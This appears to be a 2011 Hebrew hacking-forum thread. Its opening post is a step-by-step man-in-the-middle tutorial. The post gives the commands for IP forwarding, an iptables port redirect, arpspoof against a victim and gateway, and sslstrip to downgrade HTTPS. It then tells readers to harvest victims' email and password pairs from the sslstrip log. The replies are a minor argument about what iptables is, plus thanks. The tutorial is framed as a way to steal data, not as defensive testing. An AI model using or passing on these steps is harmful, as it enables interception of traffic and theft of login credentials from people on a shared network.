H1jackMyServer-פרק 3-חלק 2

**sapirshemer** · 14-07-2011, 17:35

פרק 3-מתקפות
חלק 2-מתקפות-מתקפת האדם באמצע!
שלום לכל הפורום היום אני ילמד אתכם מתקפה שאני ממש אוהב שנקראת man in the middle attack מתקפת האדם באמצע הקיצור של זה הוא mitm attack...
בכללי מטרת המתקפה היא לגנוב מידע בין שני מחשבים זאת אומרת "להיכנס בינהם" שזה אומר להגיד למחשב הראשון שאנחנו השני ולשני שאנחנו הראשון.
אז נתחיל,
לפני שעושים את המתקפה צריך לשים את המחשב שלנו על forwarding mode(מצב שילוח).
קודם נבדוק אם הוא עכשיו במצב שילוח, נרשום:

קוד:

cat /proc/sys/net/ipv4/ip_forward

אם זה ירשום לנו 0 סימן שאנחנו לא על מצב שילוח ואנחנו צריכים לשנות את זה לאחד ע"י זה שנרשום:

קוד:

echo 1 > /proc/sys/net/ipv4/ip_forward

רשמתי echo שזה אומר להדפיס ואני רוצה להדפיס את הערך 1, הסימן < אומר להחליף את הערך הקיים בערך חדש(ע"י echo).
עכשיו נבדוק אם זה עבד:

קוד:

cat /proc/sys/net/ipv4/ip_forward

וזה אמור להדפיס לנו את המספר 1 על המסך.
נמשיך,
עכשיו נשחק קצת עם ה-iptables(טבלאות אייפי).
נרשום:

קוד:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

עכשיו אני יסביר על הפקודה:

-t = טבלת אייפי
-A = הוספת חוק
-p = פרוטוקול
--destination-port = הפורט שעליו נעשה את המתקפה
-j = לקפוץ(מה לעשות עם המידע שנשיג, לאן לשלוח אותו)
--to-port = הפורט שאתם רוצים לעשות בו את ה- "REDIRECT".

nat = טבלת אייפי
PREROUTING = חוק
tcp/udp = פרוטוקולים
80 = הפורט שעושים עליו את המתקפה
REDIRECT = לשלוח את המידע שנקבל ללוקלהוסט שלנו(המחשב שלנו) לפורט מסויים
8080 = הפורט שעליו נשלח את המידע שנקבל מהמקפה כדי למנוע שאלות מטוטמות אפשר לרשום כל פורט במקום 8080 אבל בשלב מאוחר תצתרכו לזכור את הפורט הזה אז אל תחרבשו סתם פורט שאתם לא יודעים...

ועכשיו כשעשינו את זה למתקפה,
עכשיו מה שאנחנו צריכים לעשות זה להגיד למחשב 1 שאנחנו מחשב 2 ולמחשב 2 שאנחנו מחשב 1, ככה:

קוד:

arpspoof -i wlan0 -t IP1 IP2

ועכשיו נסביר:

-i = סוג החיבר שלנו לרשת(wlan0 או wifi0-רשת על חוטית eth0-רשת חוטית)
-t = המחשב שעליו עושים את המתקפה ואחרי זה השרת שרוצים לקבל ממנו את המידע(ip1 ו ip2).

עכשיו כשאמרנו לכל אחד שאנחנו השני אנחנו בבעיה, במקרה והוא יכנס לאתר https(Hyper Text Transfer Protocol Secured) אז אנחנו צריכים לבצעה את המתקפה על sslstrip

אז עכשיו אנחנו נצרך להאזין בעזרת sslstrip כך:
בקונסול חדש:

קוד:

cd /pentest/web/sslstrip

ואז:

קוד:

python sslstrip.py -l 8080

עכשיו הסבר:

cd = לעבור למיקום מסויים.
python = להריץ סקריפט שבנוי על שפת פייתון
-l = הפורט שעליו המידע אמור להגיע
8080 = הפורט שהחלטנו שעליו המידע יגיע(אם אתם לא זוכרים למה זה 8080 אז תתחילו לקרוא שוב אתם תשימו לך)

עכשיו פותחים עוד קונסול כדי לבדוק איזה מידע הגיע עלינו,
נרשום:

קוד:

cd /pentest/web/sslstrip

ואז:

קוד:

more sslstrip.log

כבר הסברתי מזה cd ו-more זה פשוט מה רשום בקובץ מסויים...
בקיצור תעשו more sslstrip.log כל 5 דקות, יהיה קשה לקרוא את המידע אבל נגיד כשהקורבן יכנס למשתמש בגוגל זה יהיה משהו כזה:
email=email;password=pass
אבל יהיה קשה למצוא את השורה הזאת אבל עם הזמן מתרגלים ומתחילים למצוא מהר.
זה היה מדיך ממש מפורט וממש השקעתי בו, תגובות בבקשה!

המשך יום נעים

תהנו

כל הזכיות שמורות לי.

**Num32** · 14-07-2011, 18:16

IPTABLES זה הFireWall של לינוקס.(לא טבלאות אייפי!!)

**sapirshemer** · 14-07-2011, 18:34

נכתב במקור על ידי Num32

IPTABLES זה הFireWall של לינוקס.(לא טבלאות אייפי!!)

לא נכון,
iptables is a user space application program that allows a system administrator to configure the tables provided by the Linux kernel firewall (implemented as different Netfilter modules) and the chains and rules it stores.
לעוד מידע על זה:
http://en.wikipedia.org/wiki/Iptables

**ShRedDeR** · 14-07-2011, 19:52

תודה רבה על המידע!

**SlashxmE** · 15-07-2011, 03:43

מעתיקים ממך בפורום *** והוא אומר שהזכויות שמורות לו

**sapirshemer** · 15-07-2011, 10:27

נכתב במקור על ידי SlashxmE

מעתיקים ממך בפורום *** והוא אומר שהזכויות שמורות לו

לא מעתיקים זה אני פרסמתי בפורום ***...אני FHack3r...

**Num32** · 15-07-2011, 11:01

http://www.linuxhomenetworking.com/w...Using_iptables

**sapirshemer** · 15-07-2011, 12:33

נכתב במקור על ידי Num32

http://www.linuxhomenetworking.com/w...Using_iptables

אתה בעצמך נותן לי מידע שאומר שאתה טועה,
הפיירוול רק משתמש בזה זה לא אומר שזה הפיירוול

iptables:

וכו' הפיירוול משתמש בזה כדי לזהות את המחשבים ברשת,לחסום וכדומה...

**sapirshemer** · 17-07-2011, 16:39

תגובות בבקשה

**include** · 17-07-2011, 22:01

תודה רבה.

**ProVirus** · 23-07-2011, 03:48

כל הכבוד!

לללללללללינקיייייייייה

**Ori** · 23-07-2011, 08:31

iptables בלינוקס זה ה ACL (סוג של חומת אש נורא בסיסית) שם רשום מי מה מו למה ואיך יכול להיכנס למערכת
לכן נועם צודק בטענה שלו

מי מה מו למה איך =איזה אי פי באיזה פורט מאיזה אי פי ומאיזה פורט באיזה מצב
%מי מה מו למה ואיך%==127.0.0.1:4573 מגיע מאיפי 127.0.0.1:80 דרך פרוטוקול tcp בישום html

**Num32** · 24-07-2011, 14:19

נכתב במקור על ידי Ori

iptables בלינוקס זה ה ACL (סוג של חומת אש נורא בסיסית) שם רשום מי מה מו למה ואיך יכול להיכנס למערכת
לכן נועם צודק בטענה שלו

מי מה מו למה איך =איזה אי פי באיזה פורט מאיזה אי פי ומאיזה פורט באיזה מצב
%מי מה מו למה ואיך%==127.0.0.1:4573 מגיע מאיפי 127.0.0.1:80 דרך פרוטוקול tcp בישום html

לא קוראים לי נועם - קוראים לי בניה :פ

**Ori** · 24-07-2011, 16:21

נכתב במקור על ידי Num32

לא קוראים לי נועם - קוראים לי בניה :פ

הנחתי שיש לך טעות בניק וזה צריך להיות נועם, אוקי אז בניה צודק

שם משתמש		זכור אותי	רישום לאתר
סיסמה		שכחת סיסמה?

קהילות פורומים, הורדות, יעוץ ותמיכה

אשכולות דומים

[פרסום] H1jackMyServer-פרק 3-מתקפות-חלק 3

[פרסום] H1jackMyServer-פרק 3-מתקפות-חלק 1

[פרסום] H1jackMyServer-פרק 2-פריצת רשתות-חלק 3

[פרסום] H1jackMyServer-פרק 2-פריצת רשתות-חלק 2

[פרסום] H1jackMyServer-פרק 2-פריצת רשתות-חלק 1

H1jackMyServer-פרק 3-חלק 2

כלי נושא

H1jackMyServer-פרק 3-חלק 2

הרשאות פרסום